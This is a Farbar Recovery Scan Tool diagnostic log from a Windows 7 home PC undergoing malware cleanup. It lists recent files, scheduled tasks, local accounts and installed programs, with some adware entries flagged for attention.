S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109336 2016-10-24] (McAfee, Inc. -> McAfee, Inc.)
S3 mfeplk; C:\Windows\System32\drivers\mfeplk.sys [110248 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [254800 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 SrvHsfHDA; C:\Windows\System32\DRIVERS\VSTAZL6.SYS [292864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SrvHsfV92; C:\Windows\System32\DRIVERS\VSTDPV6.SYS [1485312 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SrvHsfWinac; C:\Windows\System32\DRIVERS\VSTCNXT6.SYS [740864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13920 2017-01-26] (SlimWare Utilities Inc. -> )
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [52736 2012-07-09] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
NETSVC: MsF928BDEEApp -> no filepath.
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-03-29 19:42 - 2022-03-29 19:43 - 000023627 _____ C:\Users\Marilyn\Desktop\FRST.txt
2022-03-29 17:33 - 2022-03-29 17:33 - 000001203 _____ C:\Users\Marilyn\Desktop\ESET Online Scanner.lnk
2022-03-29 17:33 - 2022-03-29 15:21 - 015274968 _____ (ESET) C:\Users\Marilyn\Desktop\esetonlinescanner.exe
2022-03-29 17:30 - 2022-03-29 17:30 - 000000000 ____D C:\Users\Marilyn\AppData\Local\ESET
2022-03-29 17:29 - 2022-03-29 17:29 - 000003448 _____ C:\Windows\system32\Tasks\Mysa1
2022-03-29 17:29 - 2022-03-29 17:29 - 000003444 _____ C:\Windows\system32\Tasks\ok
2022-03-29 17:29 - 2022-03-29 17:29 - 000003342 _____ C:\Windows\system32\Tasks\oka
2022-03-29 14:54 - 2022-03-29 14:54 - 000001908 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2022-03-29 14:50 - 2022-03-29 19:40 - 000000346 _____ C:\Windows\Tasks\EOSv3 Scheduler onTime.job
2022-03-29 14:50 - 2022-03-29 19:40 - 000000346 _____ C:\Windows\Tasks\EOSv3 Scheduler onLogOn.job
2022-03-29 12:58 - 2022-03-29 12:58 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\ESET
2022-03-29 12:55 - 2022-03-29 12:55 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\ElevatedDiagnostics
2022-03-29 12:48 - 2022-03-29 12:48 - 000000000 ____D C:\Program Files\Kodi
2022-03-29 12:31 - 2022-03-29 12:44 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\_
2022-03-29 12:07 - 2022-03-29 12:07 - 000113928 _____ C:\Users\Administrator.Marilyn-HP\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-29 11:29 - 2022-03-29 11:29 - 000000000 ____D C:\Users\Marilyn\AppData\Local\_
2022-03-29 11:03 - 2022-03-29 11:59 - 000002684 _____ C:\Users\Marilyn\Desktop\Rkill.txt
2022-03-28 22:49 - 2022-03-28 22:49 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Apple Computer
2022-03-28 22:49 - 2022-03-28 22:49 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\BraveSoftware
2022-03-28 22:48 - 2022-03-28 22:47 - 000069040 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2022-03-28 21:56 - 2022-03-29 17:29 - 000003330 _____ C:\Windows\system32\Tasks\MicrosoftsWindowsy
2022-03-28 21:55 - 2022-03-28 21:55 - 000000008 __RSH C:\ProgramData\ntuser.pol
2022-03-28 21:48 - 2022-03-28 21:58 - 000070396 _____ C:\Users\Marilyn\Desktop\Fixlog.txt
2022-03-28 17:49 - 2022-03-28 17:49 - 000002323 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Brave.lnk
2022-03-28 17:49 - 2022-03-28 17:49 - 000002282 _____ C:\Users\Public\Desktop\Brave.lnk
2022-03-28 17:48 - 2022-03-28 17:48 - 000003342 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineUA
2022-03-28 17:48 - 2022-03-28 17:48 - 000003214 _____ C:\Windows\system32\Tasks\BraveSoftwareUpdateTaskMachineCore
2022-03-28 17:48 - 2022-03-28 17:48 - 000000000 ____D C:\Program Files\BraveSoftware
2022-03-28 17:48 - 2022-03-28 17:48 - 000000000 ____D C:\Program Files (x86)\BraveSoftware
2022-03-28 17:47 - 2022-03-28 17:49 - 000000000 ____D C:\Users\Marilyn\AppData\Local\BraveSoftware
2022-03-28 16:08 - 2022-03-28 16:08 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\mbam
2022-03-28 16:03 - 2022-03-28 16:03 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\McAfee File Lock
2022-03-28 12:59 - 2022-03-29 15:59 - 000248992 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2022-03-28 12:59 - 2022-03-29 15:06 - 000220568 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamChameleon.sys
2022-03-28 12:59 - 2022-03-29 14:54 - 000001920 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes.lnk
2022-03-28 12:59 - 2022-03-28 12:59 - 000000000 ____D C:\Users\Marilyn\AppData\Local\mbam
2022-03-28 12:57 - 2022-03-28 12:57 - 000000000 ____D C:\Users\Marilyn\AppData\Local\McAfee File Lock
2022-03-28 12:32 - 2022-03-28 23:00 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Everything
2022-03-28 12:32 - 2022-03-28 23:00 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\Everything
2022-03-28 12:25 - 2022-03-28 12:25 - 000001373 _____ C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2022-03-28 12:25 - 2022-03-28 12:25 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Adobe
2022-03-28 12:24 - 2022-03-28 13:39 - 000000000 ____D C:\Users\Administrator.Marilyn-HP
2022-03-28 12:24 - 2022-03-28 12:24 - 000000020 ___SH C:\Users\Administrator.Marilyn-HP\ntuser.ini
2022-03-28 12:24 - 2010-12-10 12:47 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Local\Microsoft Help
2022-03-28 12:24 - 2010-07-08 05:18 - 000000000 ____D C:\Users\Administrator.Marilyn-HP\AppData\Roaming\Media Center Programs
2022-03-28 12:04 - 2022-03-28 12:03 - 000160176 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2022-03-28 11:55 - 2022-03-28 11:55 - 000023552 ___SH C:\Users\Marilyn\Downloads\Thumbs.db
2022-03-28 11:52 - 2022-03-28 11:52 - 000000000 ____D C:\Users\Marilyn\Downloads\2019-09 Security Update for Windows 7 for x64-based Systems (KB4474419)
2022-03-28 11:32 - 2022-03-29 19:42 - 000000000 ____D C:\FRST
2022-03-28 11:26 - 2022-03-28 11:15 - 202117816 _____ (Malwarebytes) C:\Users\Administrator.Marilyn-HP\Desktop\MBSetup-0076911.0076911-4.5.2.157.exe
2022-03-28 11:03 - 2022-03-28 12:02 - 000000000 ____D C:\Program Files\Malwarebytes
2022-03-28 10:57 - 2022-03-28 10:55 - 002365440 _____ (Farbar) C:\Users\Marilyn\Desktop\FRST64.exe
2022-03-28 10:48 - 2022-03-28 10:49 - 000000000 ____D C:\AdwCleaner
2022-03-28 10:48 - 2022-03-28 10:45 - 008540344 _____ (Malwarebytes) C:\Users\Marilyn\Desktop\adwcleaner_8.3.1.exe
2022-03-27 16:18 - 2022-03-27 16:18 - 000000000 ____D C:\Quarantine
2022-03-27 15:13 - 2022-03-29 17:30 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Everything
2022-03-27 13:27 - 2022-03-29 17:30 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Everything
2022-03-27 13:27 - 2022-03-27 13:27 - 000000953 _____ C:\Users\Marilyn\Desktop\Search Everything.lnk
2022-03-27 13:27 - 2022-03-27 13:27 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Everything
2022-03-27 13:27 - 2022-03-27 13:27 - 000000000 ____D C:\Program Files\Everything
2022-03-27 12:51 - 2022-03-27 12:51 - 000000207 _____ C:\Windows\tweaking.com-regbackup-MARILYN-HP-Windows-7-Home-Premium-(64-bit).dat
2022-03-27 12:47 - 2022-03-27 12:48 - 000389123 _____ C:\Windows\Tweaking.com - Windows Repair Setup Log.txt
2022-03-25 16:32 - 2022-03-29 12:56 - 000000000 ____D C:\EEK
2022-03-25 12:42 - 2022-03-29 17:32 - 002035790 _____ C:\Windows\ntbtlog.txt
2022-03-25 12:33 - 2022-03-25 12:33 - 000000000 ____D C:\Users\Marilyn\Desktop\Microsoft Offline Safety Scanner
2022-03-25 12:09 - 2022-03-25 12:09 - 037889344 _____ (Piriform Software Ltd) C:\Users\Marilyn\Downloads\ccsetup591.exe
2022-03-24 11:39 - 2022-03-24 11:36 - 004146112 _____ (AVG Technologies CZ, s.r.o.) C:\Windows\system32\avgremoverx.exe
2022-03-24 09:51 - 2022-03-28 12:59 - 000000000 ____D C:\Users\Marilyn\AppData\LocalLow\Mozilla
2022-03-24 09:51 - 2022-03-24 09:51 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Mozilla
2022-03-24 09:02 - 2022-03-24 09:02 - 000000000 _____ C:\Users\Marilyn\AppData\Local\{34ACB9DF-E53F-41D3-8944-3B60681EB5DC}
2022-03-22 13:57 - 2022-03-24 10:52 - 000007604 _____ C:\Users\Marilyn\AppData\Local\Resmon.ResmonCfg
2022-03-22 11:46 - 2022-03-22 11:49 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Geek Uninstaller
2022-03-17 09:51 - 2022-03-17 09:51 - 000113928 _____ C:\Users\Guest\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-17 09:47 - 2022-03-17 10:02 - 000000000 ____D C:\Users\Guest\AppData\Local\Backup Assistant Plus
2022-03-08 08:38 - 2022-03-28 18:24 - 000000000 ____D C:\Windows\pss
2022-02-27 12:39 - 2022-02-27 12:44 - 002998689 _____ C:\Users\Marilyn\Desktop\tAX_1.heic
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-03-29 17:35 - 2009-07-14 01:13 - 000772352 _____ C:\Windows\system32\PerfStringBackup.INI
2022-03-29 17:35 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\inf
2022-03-29 17:30 - 2021-11-22 12:27 - 000236470 _____ C:\Windows\system32\prfh0814.dat
2022-03-29 17:30 - 2009-07-14 00:45 - 000023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2022-03-29 17:30 - 2009-07-14 00:45 - 000023248 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2022-03-29 17:29 - 2013-04-29 09:52 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Backup Assistant Plus
2022-03-29 17:27 - 2009-07-14 01:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-03-29 12:01 - 2021-10-04 20:06 - 000023270 _____ C:\Users\Public\service.txt
2022-03-29 12:01 - 2021-10-04 20:05 - 000010220 _____ C:\Users\Public\processa.txt
2022-03-29 12:01 - 2021-10-04 20:05 - 000004040 _____ C:\Users\Public\datea.txt
2022-03-29 10:52 - 2010-12-06 10:58 - 000003942 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{AB8AAEEB-E020-4223-9761-6466B42DE5D3}
2022-03-28 22:45 - 2010-11-27 18:03 - 000000000 ____D C:\Users\Marilyn
2022-03-28 21:49 - 2012-06-22 10:29 - 000000000 ____D C:\Users\Marilyn\AppData\LocalLow\Temp
2022-03-28 21:48 - 2009-07-13 23:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2022-03-28 21:48 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\SysWOW64\GroupPolicy
2022-03-28 17:34 - 2010-07-10 23:21 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Online Services
2022-03-28 17:25 - 2010-07-10 23:01 - 000000000 ____D C:\ProgramData\Temp
2022-03-28 15:45 - 2009-07-14 01:08 - 000032604 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2022-03-28 14:15 - 2010-07-10 22:01 - 000000000 ____D C:\Program Files (x86)\Hewlett-Packard
2022-03-28 14:09 - 2017-01-03 10:56 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\HP Photo Creations
2022-03-28 13:39 - 2014-03-02 10:37 - 000000000 ____D C:\Users\Jay
2022-03-28 13:39 - 2012-05-27 10:54 - 000000000 ____D C:\Users\Guest
2022-03-28 13:39 - 2012-01-25 11:27 - 000000000 ____D C:\Users\lindag
2022-03-28 13:38 - 2012-06-22 10:29 - 000000000 ____D C:\Program Files (x86)\Conduit
2022-03-28 13:37 - 2014-03-22 13:25 - 000000000 ____D C:\Users\Marilyn\AppData\Local\VisualBeeExe
2022-03-28 12:43 - 2017-01-27 10:00 - 000000000 ____D C:\Program Files\Common Files\AV
2022-03-28 12:35 - 2017-01-27 14:05 - 000000000 ____D C:\Program Files\McAfee
2022-03-28 12:25 - 2009-07-14 00:57 - 000001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2022-03-28 12:08 - 2009-07-14 01:09 - 000000000 ____D C:\Windows\system32\Tasks\WPD
2022-03-28 12:02 - 2012-11-24 12:03 - 000000000 ____D C:\ProgramData\Malwarebytes
2022-03-28 12:00 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\SysWOW64\Dism
2022-03-28 12:00 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\system32\Dism
2022-03-28 11:51 - 2009-07-14 01:32 - 000000000 ____D C:\Windows\Downloaded Program Files
2022-03-28 11:27 - 2010-11-27 18:29 - 000113928 _____ C:\Users\Marilyn\AppData\Local\GDIPFONTCACHEV1.DAT
2022-03-27 23:53 - 2012-01-29 15:39 - 000000000 ____D C:\Program Files (x86)\Coupons
2022-03-27 13:09 - 2009-07-14 00:45 - 000422688 _____ C:\Windows\system32\FNTCACHE.DAT
2022-03-27 13:04 - 2018-03-26 20:08 - 000000000 ____D C:\Users\Marilyn\Downloads\- ma caregiver affidavit form(1).pdf_files
2022-03-27 13:04 - 2009-07-13 22:34 - 000000616 _____ C:\Windows\win.ini
2022-03-27 13:01 - 2016-12-18 20:13 - 000782336 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2022-03-26 15:25 - 2009-07-13 22:34 - 000000062 _____ C:\Windows\system32\Drivers\etc\hosts_bak_383
2022-03-25 12:19 - 2009-09-06 21:57 - 000000000 ____D C:\Windows\Panther
2022-03-25 12:18 - 2014-12-02 22:17 - 000000000 ____D C:\Windows\Minidump
2022-03-25 12:18 - 2011-05-07 11:12 - 000000000 ____D C:\Users\Marilyn\AppData\Local\CrashDumps
2022-03-24 11:27 - 2012-11-26 12:13 - 000000000 ____D C:\Users\Marilyn\AppData\Local\ElevatedDiagnostics
2022-03-24 09:51 - 2017-03-29 10:21 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Mozilla
2022-03-24 09:49 - 2011-08-22 18:44 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Google
2022-03-24 09:49 - 2011-08-22 18:44 - 000000000 ____D C:\Program Files (x86)\Google
2022-03-24 09:49 - 2010-11-28 12:44 - 000000000 ____D C:\Users\Marilyn\AppData\Roaming\Adobe
2022-03-22 13:52 - 2011-11-29 10:58 - 000000000 ____D C:\Windows\system32\Macromed
2022-03-22 13:50 - 2010-07-10 22:29 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2022-03-22 13:48 - 2010-07-10 22:01 - 000000000 ____D C:\Program Files\Hewlett-Packard
2022-03-22 13:44 - 2010-07-10 22:03 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2022-03-08 08:52 - 2009-07-13 23:20 - 000000000 ____D C:\Windows\system32\NDF
2022-03-06 18:32 - 2010-11-27 18:38 - 000000000 ____D C:\Users\Marilyn\AppData\Local\Hewlett-Packard
==================== Files in the root of some directories ========
2014-08-18 09:25 - 2014-08-18 09:25 - 000000004 _____ () C:\Users\Marilyn\AppData\Roaming\2873252659
2014-08-18 09:25 - 2014-08-18 09:26 - 003133211 _____ () C:\Users\Marilyn\AppData\Roaming\3104970040
2013-12-09 18:41 - 2013-12-09 18:41 - 004889600 _____ () C:\Users\Marilyn\AppData\Roaming\IHAMC.msi
2014-03-22 13:53 - 2014-07-19 09:20 - 000000088 _____ () C:\Users\Marilyn\AppData\Roaming\WB.CFG
2013-05-03 21:28 - 2013-05-03 21:28 - 000003584 _____ () C:\Users\Marilyn\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-12-31 11:10 - 2018-12-31 11:10 - 000000542 _____ () C:\Users\Marilyn\AppData\Local\LMIR088D0001.tmp_r.bat
2022-03-22 13:57 - 2022-03-24 10:52 - 000007604 _____ () C:\Users\Marilyn\AppData\Local\Resmon.ResmonCfg
2022-03-24 09:02 - 2022-03-24 09:02 - 000000000 _____ () C:\Users\Marilyn\AppData\Local\{34ACB9DF-E53F-41D3-8944-3B60681EB5DC}
2021-10-04 18:57 - 2021-10-04 18:57 - 000000000 _____ () C:\Users\Marilyn\AppData\Local\{DAD70E7C-C7B4-47F7-87CE-76E4F783B327}
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 28-03-2022
Ran by Marilyn (29-03-2022 19:44:20)
Running from C:\Users\Marilyn\Desktop
Microsoft Windows 7 Home Premium Service Pack 1 (X64) (2010-11-27 22:03:47)
Boot Mode: Safe Mode (with Networking)
==========================================================
==================== Accounts: =============================
(If an entry is included in the fixlist, it will be removed.)
Administrator (S-1-5-21-1250379553-2428740185-3603661230-500 - Administrator - Enabled) => C:\Users\Administrator.Marilyn-HP
Guest (S-1-5-21-1250379553-2428740185-3603661230-501 - Limited - Enabled) => C:\Users\Guest
HomeGroupUser$ (S-1-5-21-1250379553-2428740185-3603661230-1002 - Limited - Enabled)
Jay (S-1-5-21-1250379553-2428740185-3603661230-1004 - Limited - Enabled) => C:\Users\Jay
Marilyn (S-1-5-21-1250379553-2428740185-3603661230-1000 - Administrator - Enabled) => C:\Users\Marilyn
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe Reader 9.5.5 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.5.5 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.5 (HKLM-x32\...\{9ECF7817-DB11-4FBA-9DF1-296A578D513A}) (Version: 11.5.7.609 - Adobe Systems, Inc)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{7446FE8D-C1F9-4D42-AAAE-5DBCE58605A6}) (Version: 6.0.0.59 - Apple Inc.)
Ask Toolbar Updater (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.5.36191 - Ask.com) <==== ATTENTION
Ask Toolbar Updater (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\{79A765E1-C399-405B-85AF-466F52E918B0}) (Version: 1.2.1.22229 - Ask.com) <==== ATTENTION
Bing Rewards Client Installer (HKLM-x32\...\{61EDBE71-5D3E-4AB7-AD95-E53FEAF68C17}) (Version: 16.0.345.0 - Microsoft Corporation) Hidden
Brave (HKLM-x32\...\BraveSoftware Brave-Browser) (Version: 99.1.36.122 - Brave Software Inc)
CinemaNow Media Manager (HKLM-x32\...\{6C122441-1861-4CD7-B1C5-A163A6984E12}) (Version: 1.9.1.105 - CinemaNow, Inc.)
Coupon Printer for Windows (HKLM-x32\...\Coupon Printer for Windows5.0.0.0) (Version: 5.0.0.0 - Coupons.com Incorporated)
CyberLink DVD Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.3003 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1616 - CyberLink Corp.)
CyberLink PowerDVD 9 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.0.1.4217 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.0.2511 - CyberLink Corp.)
Energy Star Digital Logo (HKLM-x32\...\{BD1A34C9-4764-4F79-AE1F-112F8C89D3D4}) (Version: 1.0.1 - Hewlett-Packard)
ESU for Microsoft Windows 7 (HKLM-x32\...\{3877C901-7B90-4727-A639-B6ED2DD59D43}) (Version: 1.0.0 - Hewlett-Packard)
Everything 1.4.1.935 (x64) (HKLM\...\Everything) (Version: 1.4.1.935 - David Carpenter)
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
HP MediaSmart CinemaNow 2.0 (HKLM-x32\...\{9008D736-35CA-40DB-A2BE-5F32D954E5AA}) (Version: 2.0 - Hewlett-Packard)
HP Photo Creations (HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Photo Creations (HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\HP Photo Creations) (Version: 1.0.0.22192 - HP)
HP Power Manager (HKLM-x32\...\{4B156358-CE9C-4E9F-8CAD-79AE86A68C60}) (Version: 1.0.3 - Hewlett-Packard Company)
Intel® Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1007 - Intel Corporation)
Intel® Graphics Media Accelerator Driver (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 8.15.10.2086 - Intel Corporation)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.2.1001 - Intel Corporation)
Junk Mail filter update (HKLM-x32\...\{8E5233E1-7495-44FB-8DEB-4BE906D59619}) (Version: 14.0.8117.416 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2907 - CyberLink Corp.)
Malwarebytes version 4.5.2.157 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.5.2.157 - Malwarebytes)
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{90120000-0011-0000-0000-0000000FF1CE}_PROPLUS_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version: - Microsoft)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Professional Plus 2007 (HKLM-x32\...\PROPLUS) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.10411.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022.218 (HKLM-x32\...\{E503B4BF-F7BB-3D5F-8BC8-F694B1CFF942}) (Version: 9.0.21022.218 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.40820 - Microsoft Corporation)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
PhotoNow! (HKLM-x32\...\{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.) Hidden
PhotoNow! (HKLM-x32\...\InstallShield_{D36DD326-7280-11D8-97C8-000129760CBE}) (Version: 1.1.6904 - CyberLink Corp.)
Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.) Hidden
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.4204 - CyberLink Corp.)
PowerDirector (HKLM-x32\...\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3003 - CyberLink Corp.)
Realtek Ethernet Controller Driver For Windows 7 (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.18.322.2010 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6122 - Realtek Semiconductor Corp.)
